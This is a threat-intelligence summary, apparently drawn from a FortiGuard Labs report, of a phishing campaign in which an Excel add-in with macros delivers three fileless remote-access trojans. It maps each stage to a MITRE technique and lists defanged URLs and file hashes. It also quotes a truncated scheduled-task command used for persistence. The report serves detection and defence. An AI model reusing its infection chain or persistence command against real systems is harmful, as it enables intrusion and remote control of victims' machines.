Threat Research

Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC – Part I | FortiGuard Labs 

Securonix

Fortinet FortiGuard Labs uncovered a phishing campaign that delivers three fileless malware families on Windows via a malicious Excel Add-In with VBA macros, leveraging WMI, HTML/JavaScript, and PowerShell to load and execute payloads. The operation uses persistence techniques and process hollowing to deploy AveMariaRAT, BitRAT, and PandoraHVNC, with multiple remote HTML/JS components and scheduled tasks involved. Hashtags: #AveMariaRAT #PandoraHVNC

Keypoints

  • The campaign disguises itself as a payment report email with an attached Excel Add-In (*.xlam) containing malicious macros.
  • The Excel macro uses an Auto_Open() VBA entry point to decode and execute commands via Windows Management Instrumentation (WMI).
  • It copies and renames mshta.exe to a nonstandard location (ddond.com) to download and execute a remote HTML/JS payload (APRL27.htm).
  • The HTML/JavaScript payload uses WScript.Shell to run PowerShell, download mainpw.dll, and schedule tasks for persistence.
  • The downloaded PowerShell code loads an inner .NET module dynamically and uses it to perform process hollowing against aspnet_compiler.exe.
  • The final three fileless malware samples (AveMariaRAT, BitRAT, PandoraHVNC) are deployed and executed in target processes through a dynamic, multi-stage chain.

MITRE Techniques

  • [T1566.002] Spearphishing Attachment – The phishing email tricks the recipient into opening the attached Excel document for the report detail. “This phishing email attempts to trick the recipient into opening the attached Excel document for the report detail.”
  • [T1059.005] Visual Basic – The Excel Add-In contains an auto-start Macro that uses VBA to execute code. “It contains an auto-start Macro that starts using a VBA (Visual Basic Application) method called “Auto_Open()” when the Excel file is opened.”
  • [T1047] Windows Management Instrumentation – The macro decodes a command string and executes it using a WMI object. “decodes a command string and executes it using a WMI (Windows Management Instrumentation) object.”
  • [T1218.005] Mshta – The drop uses mshta.exe by copying and renaming it, then downloads and executes a malicious HTML file. “renames it as ‘ddond.com’. ‘mshta.exe’ is a Windows-native binary file designed to execute Microsoft HTML Application (HTA) files.”
  • [T1059.001] PowerShell – The HTML/JS chain downloads a PowerShell file (mainpw.dll) and executes it. “PowerShell application to download a PowerShell file called “mainpw.dll” and then execute it.”
  • [T1053.005] Scheduled Task – A scheduled task named “calendersw” is created to run payloads at regular intervals. “schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr …”
  • [T1055.012] Process Hollowing – The inner .NET module uses process hollowing to inject payloads into a new aspnet_compiler.exe process. “performes process hollowing to inject the malware payload into a newly-created process of “aspnet_compiler.exe”.”
  • [T1620] Reflective Code Loading – The inner .Net module is dynamically loaded and executed via reflection, enabling payload deployment. “The inner .Net module that is dynamically extracted … ‘projFUD.PA.Execute()’ …”
  • [T1027] Obfuscated/Compressed Files and Information – The code uses dynamic strings and decompression to transform payloads. “The first ‘$hexString’ contains a dynamic method for performing GZip decompression.”
  • [T1105] Ingress Tool Transfer – The campaign downloads multiple remote components (APRL27.htm, mainpw.dll, back.htm, etc.) as part of the infection chain. “downloads a PowerShell file called “mainpw.dll” and then execute it.”

Indicators of Compromise

  • [URL] context – hxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file, hxxps://www[.]mediafire[.]com/file/c3zcoq7ay6nql9i/back[.]htm/file, hxxps://www[.]mediafire[.]com/file/jjyy2npmnhx6o49/Start[.]htm/file, hxxps://taxmogalupupitpamobitola[.]blogspot[.]com/atom[.]xml
  • [SHA-256] Remittance-Details-951244-1.xlam – 8007BB9CAA6A1456FFC829270BE2E62D1905D5B71E9DC9F9673DEC9AFBF13BFC
  • [SHA-256] APRL27.htm – D71ADD25520799720ADD43A5F4925B796BEA11BF55644990B4B9A70B7EAEACBA
  • [SHA-256] mainpw.dll – 3D71A243E5D9BA44E3D71D4DA15D928658F92B2F0A220B7DEFE0136108871449
  • [File name] Remittance-Details-951244.xlam, APRL27.htm, mainpw.dll

Read more: https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint